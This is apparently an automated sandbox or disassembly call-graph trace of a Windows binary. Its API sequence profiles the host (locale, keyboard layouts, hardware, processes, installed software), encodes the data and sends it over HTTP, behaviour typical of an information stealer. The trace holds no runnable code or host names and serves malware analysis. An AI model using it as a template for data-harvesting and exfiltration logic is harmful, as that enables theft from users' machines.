14727->14728 14729 fa920 3 API calls 14728->14729 14730 e4db3 14729->14730 14731 fa920 3 API calls 14730->14731 14732 e4dba 14731->14732 14733 fa8a0 lstrcpy 14732->14733 14734 e4dc6 14733->14734 14735 e4de7 lstrlen 14734->14735 14736 e4dfa 14735->14736 14737 e4e03 lstrlen 14736->14737 15676 faad0 14737->15676 14739 e4e13 HttpSendRequestA 14740 e4e32 InternetReadFile 14739->14740 14741 e4e67 InternetCloseHandle 14740->14741 14746 e4e5e 14740->14746 14744 fa800 14741->14744 14743 fa9b0 4 API calls 14743->14746 14744->14665 14745 fa8a0 lstrcpy 14745->14746 14746->14740 14746->14741 14746->14743 14746->14745 15683 faad0 14747->15683 14749 f17c4 StrCmpCA 14750 f17cf ExitProcess 14749->14750 14751 f17d7 14749->14751 14752 f19c2 14751->14752 14753 f18cf StrCmpCA 14751->14753 14754 f18ad StrCmpCA 14751->14754 14755 f187f StrCmpCA 14751->14755 14756 f185d StrCmpCA 14751->14756 14757 f1913 StrCmpCA 14751->14757 14758 f1932 StrCmpCA 14751->14758 14759 f18f1 StrCmpCA 14751->14759 14760 f1951 StrCmpCA 14751->14760 14761 f1970 StrCmpCA 14751->14761 14762 fa820 lstrlen lstrcpy 14751->14762 14752->13670 14753->14751 14754->14751 14755->14751 14756->14751 14757->14751 14758->14751 14759->14751 14760->14751 14761->14751 14762->14751 14764 fa7a0 lstrcpy 14763->14764 14765 e5979 14764->14765 14766 e47b0 2 API calls 14765->14766 14767 e5985 14766->14767 14768 fa740 lstrcpy 14767->14768 14769 e59ba 14768->14769 14770 fa740 lstrcpy 14769->14770 14771 e59c7 14770->14771 14772 fa740 lstrcpy 14771->14772 14773 e59d4 14772->14773 14774 fa740 lstrcpy 14773->14774 14775 e59e1 14774->14775 14776 fa740 lstrcpy 14775->14776 14777 e59ee InternetOpenA StrCmpCA 14776->14777 14778 e5a1d 14777->14778 14779 e5fc3 InternetCloseHandle 14778->14779 14780 f8b60 3 API calls 14778->14780 14781 e5fe0 14779->14781 14782 e5a3c 14780->14782 14784 e9ac0 4 API calls 14781->14784 14783 fa920 3 API calls 14782->14783 14785 e5a4f 14783->14785 14786 e5fe6 14784->14786 14787 fa8a0 lstrcpy 14785->14787 14788 fa820 2 API calls 14786->14788 14791 e601f codecvt 14786->14791 14793 e5a58 14787->14793 14789 e5ffd 14788->14789 14790 fa9b0 4 API calls 14789->14790 14792 e6013 14790->14792 14795 fa7a0 lstrcpy 14791->14795 14794 fa8a0 lstrcpy 14792->14794 14796 fa9b0 4 API calls 14793->14796 14794->14791 14804 e604f 14795->14804 14797 e5a82 14796->14797 14798 fa8a0 lstrcpy 14797->14798 14799 e5a8b 14798->14799 14800 fa9b0 4 API calls 14799->14800 14801 e5aaa 14800->14801 14802 fa8a0 lstrcpy 14801->14802 14803 e5ab3 14802->14803 14805 fa920 3 API calls 14803->14805 14804->13676 14806 e5ad1 14805->14806 14807 fa8a0 lstrcpy 14806->14807 14808 e5ada 14807->14808 14809 fa9b0 4 API calls 14808->14809 14810 e5af9 14809->14810 14811 fa8a0 lstrcpy 14810->14811 14812 e5b02 14811->14812 14813 fa9b0 4 API calls 14812->14813 14814 e5b21 14813->14814 14815 fa8a0 lstrcpy 14814->14815 14816 e5b2a 14815->14816 14817 fa9b0 4 API calls 14816->14817 14818 e5b56 14817->14818 14819 fa920 3 API calls 14818->14819 14820 e5b5d 14819->14820 14821 fa8a0 lstrcpy 14820->14821 14822 e5b66 14821->14822 14823 e5b7c InternetConnectA 14822->14823 14823->14779 14824 e5bac HttpOpenRequestA 14823->14824 14826 e5c0b 14824->14826 14827 e5fb6 InternetCloseHandle 14824->14827 14828 fa9b0 4 API calls 14826->14828 14827->14779 14829 e5c1f 14828->14829 14830 fa8a0 lstrcpy 14829->14830 14831 e5c28 14830->14831 14832 fa920 3 API calls 14831->14832 14833 e5c46 14832->14833 14834 fa8a0 lstrcpy 14833->14834 14835 e5c4f 14834->14835 14836 fa9b0 4 API calls 14835->14836 14837 e5c6e 14836->14837 14838 fa8a0 lstrcpy 14837->14838 14839 e5c77 14838->14839 14840 fa9b0 4 API calls 14839->14840 14841 e5c98 14840->14841 14842 fa8a0 lstrcpy 14841->14842 14843 e5ca1 14842->14843 14844 fa9b0 4 API calls 14843->14844 14845 e5cc1 14844->14845 14846 fa8a0 lstrcpy 14845->14846 14847 e5cca 14846->14847 14848 fa9b0 4 API calls 14847->14848 14849 e5ce9 14848->14849 14850 fa8a0 lstrcpy 14849->14850 14851 e5cf2 14850->14851 14852 fa920 3 API calls 14851->14852 14853 e5d10 14852->14853 14854 fa8a0 lstrcpy 14853->14854 14855 e5d19 14854->14855 14856 fa9b0 4 API calls 14855->14856 14857 e5d38 14856->14857 14858 fa8a0 lstrcpy 14857->14858 14859 e5d41 14858->14859 14860 fa9b0 4 API calls 14859->14860 14861 e5d60 14860->14861 14862 fa8a0 lstrcpy 14861->14862 14863 e5d69 14862->14863 14864 fa920 3 API calls 14863->14864 14865 e5d87 14864->14865 14866 fa8a0 lstrcpy 14865->14866 14867 e5d90 14866->14867 14868 fa9b0 4 API calls 14867->14868 14869 e5daf 14868->14869 14870 fa8a0 lstrcpy 14869->14870 14871 e5db8 14870->14871 14872 fa9b0 4 API calls 14871->14872 14873 e5dd9 14872->14873 14874 fa8a0 lstrcpy 14873->14874 14875 e5de2 14874->14875 14876 fa9b0 4 API calls 14875->14876 14877 e5e02 14876->14877 14878 fa8a0 lstrcpy 14877->14878 14879 e5e0b 14878->14879 14880 fa9b0 4 API calls 14879->14880 14881 e5e2a 14880->14881 14882 fa8a0 lstrcpy 14881->14882 14883 e5e33 14882->14883 14884 fa920 3 API calls 14883->14884 14885 e5e54 14884->14885 14886 fa8a0 lstrcpy 14885->14886 14887 e5e5d 14886->14887 14888 e5e70 lstrlen 14887->14888 15684 faad0 14888->15684 14890 e5e81 lstrlen GetProcessHeap RtlAllocateHeap 15685 faad0 14890->15685 14892 e5eae lstrlen 14893 e5ebe 14892->14893 14894 e5ed7 lstrlen 14893->14894 14895 e5ee7 14894->14895 14896 e5ef0 lstrlen 14895->14896 14897 e5f03 14896->14897 14898 e5f1a lstrlen 14897->14898 15686 faad0 14898->15686 14900 e5f2a HttpSendRequestA 14901 e5f35 InternetReadFile 14900->14901 14902 e5f6a InternetCloseHandle 14901->14902 14906 e5f61 14901->14906 14902->14827 14904 fa9b0 4 API calls 14904->14906 14905 fa8a0 lstrcpy 14905->14906 14906->14901 14906->14902 14906->14904 14906->14905 14909 f1077 14907->14909 14908 f1151 14908->13678 14909->14908 14910 fa820 lstrlen lstrcpy 14909->14910 14910->14909 14916 f0db7 14911->14916 14912 f0f17 14912->13686 14913 f0e27 StrCmpCA 14913->14916 14914 f0e67 StrCmpCA 14914->14916 14915 f0ea4 StrCmpCA 14915->14916 14916->14912 14916->14913 14916->14914 14916->14915 14917 fa820 lstrlen lstrcpy 14916->14917 14917->14916 14919 f0f67 14918->14919 14920 f1044 14919->14920 14921 f0fb2 StrCmpCA 14919->14921 14922 fa820 lstrlen lstrcpy 14919->14922 14920->13694 14921->14919 14922->14919 14924 fa740 lstrcpy 14923->14924 14925 f1a26 14924->14925 14926 fa9b0 4 API calls 14925->14926 14927 f1a37 14926->14927 14928 fa8a0 lstrcpy 14927->14928 14929 f1a40 14928->14929 14930 fa9b0 4 API calls 14929->14930 14931 f1a5b 14930->14931 14932 fa8a0 lstrcpy 14931->14932 14933 f1a64 14932->14933 14934 fa9b0 4 API calls 14933->14934 14935 f1a7d 14934->14935 14936 fa8a0 lstrcpy 14935->14936 14937 f1a86 14936->14937 14938 fa9b0 4 API calls 14937->14938 14939 f1aa1 14938->14939 14940 fa8a0 lstrcpy 14939->14940 14941 f1aaa 14940->14941 14942 fa9b0 4 API calls 14941->14942 14943 f1ac3 14942->14943 14944 fa8a0 lstrcpy 14943->14944 14945 f1acc 14944->14945 14946 fa9b0 4 API calls 14945->14946 14947 f1ae7 14946->14947 14948 fa8a0 lstrcpy 14947->14948 14949 f1af0 14948->14949 14950 fa9b0 4 API calls 14949->14950 14951 f1b09 14950->14951 14952 fa8a0 lstrcpy 14951->14952 14953 f1b12 14952->14953 14954 fa9b0 4 API calls 14953->14954 14955 f1b2d 14954->14955 14956 fa8a0 lstrcpy 14955->14956 14957 f1b36 14956->14957 14958 fa9b0 4 API calls 14957->14958 14959 f1b4f 14958->14959 14960 fa8a0 lstrcpy 14959->14960 14961 f1b58 14960->14961 14962 fa9b0 4 API calls 14961->14962 14963 f1b76 14962->14963 14964 fa8a0 lstrcpy 14963->14964 14965 f1b7f 14964->14965 14966 f7500 6 API calls 14965->14966 14967 f1b96 14966->14967 14968 fa920 3 API calls 14967->14968 14969 f1ba9 14968->14969 14970 fa8a0 lstrcpy 14969->14970 14971 f1bb2 14970->14971 14972 fa9b0 4 API calls 14971->14972 14973 f1bdc 14972->14973 14974 fa8a0 lstrcpy 14973->14974 14975 f1be5 14974->14975 14976 fa9b0 4 API calls 14975->14976 14977 f1c05 14976->14977 14978 fa8a0 lstrcpy 14977->14978 14979 f1c0e 14978->14979 15687 f7690 GetProcessHeap RtlAllocateHeap 14979->15687 14982 fa9b0 4 API calls 14983 f1c2e 14982->14983 14984 fa8a0 lstrcpy 14983->14984 14985 f1c37 14984->14985 14986 fa9b0 4 API calls 14985->14986 14987 f1c56 14986->14987 14988 fa8a0 lstrcpy 14987->14988 14989 f1c5f 14988->14989 14990 fa9b0 4 API calls 14989->14990 14991 f1c80 14990->14991 14992 fa8a0 lstrcpy 14991->14992 14993 f1c89 14992->14993 15694 f77c0 GetCurrentProcess IsWow64Process 14993->15694 14996 fa9b0 4 API calls 14997 f1ca9 14996->14997 14998 fa8a0 lstrcpy 14997->14998 14999 f1cb2 14998->14999 15000 fa9b0 4 API calls 14999->15000 15001 f1cd1 15000->15001 15002 fa8a0 lstrcpy 15001->15002 15003 f1cda 15002->15003 15004 fa9b0 4 API calls 15003->15004 15005 f1cfb 15004->15005 15006 fa8a0 lstrcpy 15005->15006 15007 f1d04 15006->15007 15008 f7850 3 API calls 15007->15008 15009 f1d14 15008->15009 15010 fa9b0 4 API calls 15009->15010 15011 f1d24 15010->15011 15012 fa8a0 lstrcpy 15011->15012 15013 f1d2d 15012->15013 15014 fa9b0 4 API calls 15013->15014 15015 f1d4c 15014->15015 15016 fa8a0 lstrcpy 15015->15016 15017 f1d55 15016->15017 15018 fa9b0 4 API calls 15017->15018 15019 f1d75 15018->15019 15020 fa8a0 lstrcpy 15019->15020 15021 f1d7e 15020->15021 15022 f78e0 3 API calls 15021->15022 15023 f1d8e 15022->15023 15024 fa9b0 4 API calls 15023->15024 15025 f1d9e 15024->15025 15026 fa8a0 lstrcpy 15025->15026 15027 f1da7 15026->15027 15028 fa9b0 4 API calls 15027->15028 15029 f1dc6 15028->15029 15030 fa8a0 lstrcpy 15029->15030 15031 f1dcf 15030->15031 15032 fa9b0 4 API calls 15031->15032 15033 f1df0 15032->15033 15034 fa8a0 lstrcpy 15033->15034 15035 f1df9 15034->15035 15696 f7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15035->15696 15038 fa9b0 4 API calls 15039 f1e19 15038->15039 15040 fa8a0 lstrcpy 15039->15040 15041 f1e22 15040->15041 15042 fa9b0 4 API calls 15041->15042 15043 f1e41 15042->15043 15044 fa8a0 lstrcpy 15043->15044 15045 f1e4a 15044->15045 15046 fa9b0 4 API calls 15045->15046 15047 f1e6b 15046->15047 15048 fa8a0 lstrcpy 15047->15048 15049 f1e74 15048->15049 15698 f7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15049->15698 15052 fa9b0 4 API calls 15053 f1e94 15052->15053 15054 fa8a0 lstrcpy 15053->15054 15055 f1e9d 15054->15055 15056 fa9b0 4 API calls 15055->15056 15057 f1ebc 15056->15057 15058 fa8a0 lstrcpy 15057->15058 15059 f1ec5 15058->15059 15060 fa9b0 4 API calls 15059->15060 15061 f1ee5 15060->15061 15062 fa8a0 lstrcpy 15061->15062 15063 f1eee 15062->15063 15701 f7b00 GetUserDefaultLocaleName 15063->15701 15066 fa9b0 4 API calls 15067 f1f0e 15066->15067 15068 fa8a0 lstrcpy 15067->15068 15069 f1f17 15068->15069 15070 fa9b0 4 API calls 15069->15070 15071 f1f36 15070->15071 15072 fa8a0 lstrcpy 15071->15072 15073 f1f3f 15072->15073 15074 fa9b0 4 API calls 15073->15074 15075 f1f60 15074->15075 15076 fa8a0 lstrcpy 15075->15076 15077 f1f69 15076->15077 15705 f7b90 15077->15705 15079 f1f80 15080 fa920 3 API calls 15079->15080 15081 f1f93 15080->15081 15082 fa8a0 lstrcpy 15081->15082 15083 f1f9c 15082->15083 15084 fa9b0 4 API calls 15083->15084 15085 f1fc6 15084->15085 15086 fa8a0 lstrcpy 15085->15086 15087 f1fcf 15086->15087 15088 fa9b0 4 API calls 15087->15088 15089 f1fef 15088->15089 15090 fa8a0 lstrcpy 15089->15090 15091 f1ff8 15090->15091 15717 f7d80 GetSystemPowerStatus 15091->15717 15094 fa9b0 4 API calls 15095 f2018 15094->15095 15096 fa8a0 lstrcpy 15095->15096 15097 f2021 15096->15097 15098 fa9b0 4 API calls 15097->15098 15099 f2040 15098->15099 15100 fa8a0 lstrcpy 15099->15100 15101 f2049 15100->15101 15102 fa9b0 4 API calls 15101->15102 15103 f206a 15102->15103 15104 fa8a0 lstrcpy 15103->15104 15105 f2073 15104->15105 15106 f207e GetCurrentProcessId 15105->15106 15719 f9470 OpenProcess 15106->15719 15109 fa920 3 API calls 15110 f20a4 15109->15110 15111 fa8a0 lstrcpy 15110->15111 15112 f20ad 15111->15112 15113 fa9b0 4 API calls 15112->15113 15114 f20d7 15113->15114 15115 fa8a0 lstrcpy 15114->15115 15116 f20e0 15115->15116 15117 fa9b0 4 API calls 15116->15117 15118 f2100 15117->15118 15119 fa8a0 lstrcpy 15118->15119 15120 f2109 15119->15120 15724 f7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15120->15724 15123 fa9b0 4 API calls 15124 f2129 15123->15124 15125 fa8a0 lstrcpy 15124->15125 15126 f2132 15125->15126 15127 fa9b0 4 API calls 15126->15127 15128 f2151 15127->15128 15129 fa8a0 lstrcpy 15128->15129 15130 f215a 15129->15130 15131 fa9b0 4 API calls 15130->15131 15132 f217b 15131->15132 15133 fa8a0 lstrcpy 15132->15133 15134 f2184 15133->15134 15728 f7f60 15134->15728 15137 fa9b0 4 API calls 15138 f21a4 15137->15138 15139 fa8a0 lstrcpy 15138->15139 15140 f21ad 15139->15140 15141 fa9b0 4 API calls 15140->15141 15142 f21cc 15141->15142 15143 fa8a0 lstrcpy 15142->15143 15144 f21d5 15143->15144 15145 fa9b0 4 API calls 15144->15145 15146 f21f6 15145->15146 15147 fa8a0 lstrcpy 15146->15147 15148 f21ff 15147->15148 15741 f7ed0 GetSystemInfo wsprintfA 15148->15741 15151 fa9b0 4 API calls 15152 f221f 15151->15152 15153 fa8a0 lstrcpy 15152->15153 15154 f2228 15153->15154 15155 fa9b0 4 API calls 15154->15155 15156 f2247 15155->15156 15157 fa8a0 lstrcpy 15156->15157 15158 f2250 15157->15158 15159 fa9b0 4 API calls 15158->15159 15160 f2270 15159->15160 15161 fa8a0 lstrcpy 15160->15161 15162 f2279 15161->15162 15743 f8100 GetProcessHeap RtlAllocateHeap 15162->15743 15165 fa9b0 4 API calls 15166 f2299 15165->15166 15167 fa8a0 lstrcpy 15166->15167 15168 f22a2 15167->15168 15169 fa9b0 4 API calls 15168->15169 15170 f22c1 15169->15170 15171 fa8a0 lstrcpy 15170->15171 15172 f22ca 15171->15172 15173 fa9b0 4 API calls 15172->15173 15174 f22eb 15173->15174 15175 fa8a0 lstrcpy 15174->15175 15176 f22f4 15175->15176 15749 f87c0 15176->15749 15179 fa920 3 API calls 15180 f231e 15179->15180 15181 fa8a0 lstrcpy 15180->15181 15182 f2327 15181->15182 15183 fa9b0 4 API calls 15182->15183 15184 f2351 15183->15184 15185 fa8a0 lstrcpy 15184->15185 15186 f235a 15185->15186 15187 fa9b0 4 API calls 15186->15187 15188 f237a 15187->15188 15189 fa8a0 lstrcpy 15188->15189 15190 f2383 15189->15190 15191 fa9b0 4 API calls 15190->15191 15192 f23a2 15191->15192 15193 fa8a0 lstrcpy 15192->15193 15194 f23ab 15193->15194 15754 f81f0 15194->15754 15196 f23c2 15197 fa920 3 API calls 15196->15197 15198 f23d5 15197->15198 15199 fa8a0 lstrcpy 15198->15199 15200 f23de 15199->15200 15201 fa9b0 4 API calls 15200->15201 15202 f240a 15201->15202 15203 fa8a0 lstrcpy 15202->15203 15204 f2413 15203->15204 15205 fa9b0 4 API calls 15204->15205 15206 f2432 15205->15206 15207 fa8a0 lstrcpy 15206->15207 15208 f243b 15207->15208 15209 fa9b0 4 API calls 15208->15209 15210 f245c 15209->15210 15211 fa8a0 lstrcpy 15210->15211 15212 f2465 15211->15212 15213 fa9b0 4 API calls 15212->15213 15214 f2484 15213->15214 15215 fa8a0 lstrcpy 15214->15215 15216 f248d 15215->15216 15217 fa9b0 4 API calls 15216->15217 15218 f24ae 15217->15218 15219 fa8a0 lstrcpy 15218->15219 15220 f24b7 15219->15220 15762 f8320 15220->15762 15222 f24d3 15223 fa920 3 API calls 15222->15223 15224 f24e6 15223->15224 15225 fa8a0 lstrcpy 15224->15225 15226 f24ef 15225->15226 15227 fa9b0 4 API calls 15226->15227 15228 f2519 15227->15228 15229 fa8a0 lstrcpy 15228->15229 15230 f2522 15229->15230 15231 fa9b0 4 API calls 15230->15231 15232 f2543 15231->15232 15233 fa8a0 lstrcpy 15232->15233 15234 f254c 15233->15234 15235 f8320 17 API calls 15234->15235 15236 f2568 15235->15236 15237 fa920 3 API calls 15236->15237 15238 f257b 15237->15238 15239 fa8a0 lstrcpy 15238->15239 15240 f2584 15239->15240 15241 fa9b0 4 API calls 15240->15241 15242 f25ae 15241->15242 15243 fa8a0 lstrcpy 15242->15243 15244 f25b7 15243->15244 15245 fa9b0 4 API calls 15244->15245 15246 f25d6 15245->15246 15247 fa8a0 lstrcpy 15246->15247 15248 f25df 15247->15248 15249 fa9b0 4 API calls 15248->15249 15250 f2600 15249->15250 15251 fa8a0 lstrcpy 15250->15251 15252 f2609 15251->15252 15798 f8680 15252->15798 15254 f2620 15255 fa920 3 API calls 15254->15255 15256 f2633 15255->15256 15257 fa8a0 lstrcpy 15256->15257 15258 f263c 15257->15258 15259 f265a lstrlen 15258->15259 15260 f266a 15259->15260 15261 fa740 lstrcpy 15260->15261 15262 f267c 15261->15262 15263 e1590 lstrcpy 15262->15263 15264 f268d 15263->15264 15808 f5190 15264->15808 15266 f2699 15266->13698 15996 faad0 15267->15996 15269 e5009 InternetOpenUrlA 15273 e5021 15269->15273 15270 e502a InternetReadFile 15270->15273 15271 e50a0 InternetCloseHandle InternetCloseHandle 15272 e50ec 15271->15272 15272->13702 15273->15270 15273->15271 15997 e98d0 15274->15997 15276 f0759 15277 f077d 15276->15277 15278 f0a38 15276->15278 15281 f0799 StrCmpCA 15277->15281 15279 e1590 lstrcpy 15278->15279 15280 f0a49 15279->15280 16173 f0250 15280->16173 15283 f0843 15281->15283 15284 f07a8 15281->15284 15287 f0865 StrCmpCA 15283->15287 15286 fa7a0 lstrcpy 15284->15286 15288 f07c3 15286->15288 15289 f0874 15287->15289 15326 f096b 15287->15326 15290 e1590 lstrcpy 15288->15290 15291 fa740 lstrcpy 15289->15291 15292 f080c 15290->15292 15295 f0881 15291->15295 15293 fa7a0 lstrcpy 15292->15293 15296 f0823 15293->15296 15294 f099c StrCmpCA 15297 f09ab 15294->15297 15298 f0a2d 15294->15298 15299 fa9b0 4 API calls 15295->15299 15300 fa7a0 lstrcpy 15296->15300 15301 e1590 lstrcpy 15297->15301 15298->13706 15302 f08ac 15299->15302 15303 f083e 15300->15303 15304 f09f4 15301->15304 15305 fa920 3 API calls 15302->15305 16000 efb00 15303->16000 15307 fa7a0 lstrcpy 15304->15307 15308 f08b3 15305->15308 15310 f0a0d 15307->15310 15309 fa9b0 4 API calls 15308->15309 15311 f08ba 15309->15311 15312 fa7a0 lstrcpy 15310->15312 15314 fa8a0 lstrcpy 15311->15314 15313 f0a28 15312->15313 16116 f0030 15313->16116 15326->15294 15648 fa7a0 lstrcpy 15647->15648 15649 e1683 15648->15649 15650 fa7a0 lstrcpy 15649->15650 15651 e1695 15650->15651 15652 fa7a0 lstrcpy 15651->15652 15653 e16a7 15652->15653 15654 fa7a0 lstrcpy 15653->15654 15655 e15a3 15654->15655 15655->14529 15657 e47c6 15656->15657 15658 e4838 lstrlen 15657->15658 15682 faad0 15658->15682 15660 e4848 InternetCrackUrlA 15661 e4867 15660->15661 15661->14606 15663 fa740 lstrcpy 15662->15663 15664 f8b74 15663->15664 15665 fa740 lstrcpy 15664->15665 15666 f8b82 GetSystemTime 15665->15666 15667 f8b99 15666->15667 15668 fa7a0 lstrcpy 15667->15668 15669 f8bfc 15668->15669 15669->14621 15671 fa931 15670->15671 15672 fa988 15671->15672 15674 fa968 lstrcpy lstrcat 15671->15674 15673 fa7a0 lstrcpy 15672->15673 15675 fa994 15673->15675 15674->15672 15675->14624 15676->14739 15678 e4eee 15677->15678 15679 e9af9 LocalAlloc 15677->15679 15678->14627 15678->14630 15679->15678 15680 e9b14 CryptStringToBinaryA 15679->15680 15680->15678 15681 e9b39 LocalFree 15680->15681 15681->15678 15682->15660 15683->14749 15684->14890 15685->14892 15686->14900 15815 f77a0 15687->15815 15690 f1c1e 15690->14982 15691 f76c6 RegOpenKeyExA 15692 f76e7 RegQueryValueExA 15691->15692 15693 f7704 RegCloseKey 15691->15693 15692->15693 15693->15690 15695 f1c99 15694->15695 15695->14996 15697 f1e09 15696->15697 15697->15038 15699 f7a9a wsprintfA 15698->15699 15700 f1e84 15698->15700 15699->15700 15700->15052 15702 f7b4d 15701->15702 15704 f1efe 15701->15704 15822 f8d20 LocalAlloc CharToOemW 15702->15822 15704->15066 15706 fa740 lstrcpy 15705->15706 15707 f7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15706->15707 15716 f7c25 15707->15716 15708 f7d18 15710 f7d1e LocalFree 15708->15710 15711 f7d28 15708->15711 15709 f7c46 GetLocaleInfoA 15709->15716 15710->15711 15712 fa7a0 lstrcpy 15711->15712 15714 f7d37 15712->15714 15713 fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15713->15716 15714->15079 15715 fa8a0 lstrcpy 15715->15716 15716->15708 15716->15709 15716->15713 15716->15715 15718 f2008 15717->15718 15718->15094 15720 f94b5 15719->15720 15721 f9493 GetModuleFileNameExA CloseHandle 15719->15721 15722 fa740 lstrcpy 15720->15722 15721->15720 15723 f2091 15722->15723 15723->15109 15725 f7e68 RegQueryValueExA 15724->15725 15726 f2119 15724->15726 15727 f7e8e RegCloseKey 15725->15727 15726->15123 15727->15726 15729 f7fb9 GetLogicalProcessorInformationEx 15728->15729 15730 f7fd8 GetLastError 15729->15730 15736 f8029 15729->15736 15731 f8022 15730->15731 15740 f7fe3 15730->15740 15732 f2194 15731->15732 15735 f89f0 2 API calls 15731->15735 15732->15137 15735->15732 15737 f89f0 2 API calls 15736->15737 15738 f807b 15737->15738 15738->15731 15739 f8084 wsprintfA 15738->15739 15739->15732 15740->15729 15740->15732 15823 f89f0 15740->15823 15826 f8a10 GetProcessHeap RtlAllocateHeap 15740->15826 15742 f220f 15741->15742 15742->15151 15744 f89b0 15743->15744 15745 f814d GlobalMemoryStatusEx 15744->15745 15746 f8163 __aulldiv 15745->15746 15747 f819b wsprintfA 15746->15747 15748 f2289 15747->15748 15748->15165 15750 f87fb GetProcessHeap RtlAllocateHeap wsprintfA 15749->15750 15752 fa740 lstrcpy 15750->15752 15753 f230b 15752->15753 15753->15179 15755 fa740 lstrcpy 15754->15755 15761 f8229 15755->15761 15756 f8263 15758 fa7a0 lstrcpy 15756->15758 15757 fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15757->15761 15759 f82dc 15758->15759 15759->15196 15760 fa8a0 lstrcpy 15760->15761 15761->15756 15761->15757 15761->15760 15763 fa740 lstrcpy 15762->15763 15764 f835c RegOpenKeyExA 15763->15764 15765 f83ae 15764->15765 15766 f83d0 15764->15766 15767 fa7a0 lstrcpy 15765->15767 15768 f83f8 RegEnumKeyExA 15766->15768 15769 f8613 RegCloseKey 15766->15769 15779 f83bd 15767->15779 15771 f843f wsprintfA RegOpenKeyExA 15768->15771 15772 f860e 15768->15772 15770 fa7a0 lstrcpy 15769->15770 15770->15779 15773 f8485 RegCloseKey RegCloseKey 15771->15773 15774 f84c1 RegQueryValueExA 15771->15774 15772->15769 15777 fa7a0 lstrcpy 15773->15777 15775 f84fa lstrlen 15774->15775 15776 f8601 RegCloseKey 15774->15776 15775->15776 15778 f8510 15775->15778 15776->15772 15777->15779 15780 fa9b0 4 API calls 15778->15780 15779->15222 15781 f8527 15780->15781 15782 fa8a0 lstrcpy 15781->15782 15783 f8533 15782->15783 15784 fa9b0 4 API calls 15783->15784 15785 f8557 15784->15785 15786 fa8a0 lstrcpy 15785->15786 15787 f8563 15786->15787 15788 f856e RegQueryValueExA 15787->15788 15788->15776 15789 f85a3 15788->15789 15790 fa9b0 4 API calls 15789->15790 15791 f85ba 15790->15791 15792 fa8a0 lstrcpy 15791->15792 15793 f85c6 15792->15793 15794 fa9b0 4 API calls 15793->15794 15795 f85ea 15794->15795 15796 fa8a0 lstrcpy 15795->15796 15797 f85f6 15796->15797 15797->15776 15799 fa740 lstrcpy 15798->15799 15800 f86bc CreateToolhelp32Snapshot Process32First 15799->15800 15801 f875d CloseHandle 15800->15801 15802 f86e8 Process32Next 15800->15802 15803 fa7a0 lstrcpy 15801->15803 15802->15801 15807 f86fd 15802->15807 15806 f8776 15803->15806 15804 fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15804->15807 15805 fa8a0 lstrcpy 15805->15807 15806->15254 15807->15802 15807->15804 15807->15805 15809 fa7a0 lstrcpy 15808->15809 15810 f51b5 15809->15810 15811 e1590 lstrcpy 15810->15811 15812 f51c6 15811->15812 15827 e5100 15812->15827 15814 f51cf 15814->15266 15818 f7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15815->15818 15817 f76b9 15817->15690 15817->15691 15819 f7765 RegQueryValueExA 15818->15819 15820 f7780 RegCloseKey 15818->15820 15819->15820 15821 f7793 15820->15821 15821->15817 15822->15704 15824 f8a0c 15823->15824 15825 f89f9 GetProcessHeap HeapFree 15823->15825 15824->15740 15825->15824 15826->15740 15828 fa7a0 lstrcpy 15827->15828 15829 e5119 15828->15829 15830 e47b0 2 API calls 15829->15830 15831 e5125 15830->15831 15987 f8ea0 15831->15987 15833 e5184 15834 e5192 lstrlen 15833->15834 15835 e51a5 15834->15835 15836 f8ea0 4 API calls 15835->15836 15837 e51b6 15836->15837 15838 fa740 lstrcpy 15837->15838 15839 e51c9 15838->15839 15840 fa740 lstrcpy 15839->15840 15841 e51d6 15840->15841 15842 fa740 lstrcpy 15841->15842 15843 e51e3 15842->15843 15844 fa740 lstrcpy 15843->15844 15845 e51f0 15844->15845 15846 fa740 lstrcpy 15845->15846 15847 e51fd InternetOpenA StrCmpCA 15846->15847 15848 e522f 15847->15848 15849 e58c4 InternetCloseHandle 15848->15849 15850 f8b60 3 API calls 15848->15850 15856 e58d9 codecvt 15849->15856 15851 e524e 15850->15851 15852 fa920 3 API calls 15851->15852 15853 e5261 15852->15853 15854 fa8a0 lstrcpy 15853->15854 15855 e526a 15854->15855 15857 fa9b0 4 API calls 15855->15857 15860 fa7a0 lstrcpy 15856->15860 15858 e52ab 15857->15858 15859 fa920 3 API calls 15858->15859 15861 e52b2 15859->15861 15868 e5913 15860->15868 15862 fa9b0 4 API calls 15861->15862 15863 e52b9 15862->15863 15864 fa8a0 lstrcpy 15863->15864 15865 e52c2 15864->15865 15866 fa9b0 4 API calls 15865->15866 15867 e5303 15866->15867 15869 fa920 3 API calls 15867->15869 15868->15814 15870 e530a 15869->15870 15871 fa8a0 lstrcpy 15870->15871 15872 e5313 15871->15872 15873 e5329 InternetConnectA 15872->15873 15873->15849 15874 e5359 HttpOpenRequestA 15873->15874 15876 e58b7 InternetCloseHandle 15874->15876 15877 e53b7 15874->15877 15876->15849 15878 fa9b0 4 API calls 15877->15878 15879 e53cb 15878->15879 15880 fa8a0 lstrcpy 15879->15880 15881 e53d4 15880->15881 15882 fa920 3 API calls 15881->15882 15883 e53f2 15882->15883 15884 fa8a0 lstrcpy 15883->15884 15885 e53fb 15884->15885 15886 fa9b0 4 API calls 15885->15886 15887 e541a 15886->15887 15888 fa8a0 lstrcpy 15887->15888 15889 e5423 15888->15889 15890 fa9b0 4 API calls 15889->15890 15891 e5444 15890->15891 15892 fa8a0 lstrcpy 15891->15892 15893 e544d 15892->15893 15894 fa9b0 4 API calls 15893->15894 15895 e546e 15894->15895 15896 fa8a0 lstrcpy 15895->15896 15988 f8ead CryptBinaryToStringA 15987->15988 15992 f8ea9 15987->15992 15989 f8ece GetProcessHeap RtlAllocateHeap 15988->15989 15988->15992 15990 f8ef4 codecvt 15989->15990 15989->15992 15991 f8f05 CryptBinaryToStringA 15990->15991 15991->15992 15992->15833 15996->15269 16239 e9880 15997->16239 15999 e98e1 15999->15276 16001 fa740 lstrcpy 16000->16001 16002 efb16 16001->16002 16174 fa740 lstrcpy 16173->16174 16175 f0266 16174->16175 16176 f8de0 2 API calls 16175->16176 16177 f027b 16176->16177 16178 fa920 3 API calls 16177->16178 16179 f028b 16178->16179 16180 fa8a0 lstrcpy 16179->16180 16181 f0294 16180->16181 16182 fa9b0 4 API calls 16181->16182 16183 f02b8 16182->16183 16240 e988d 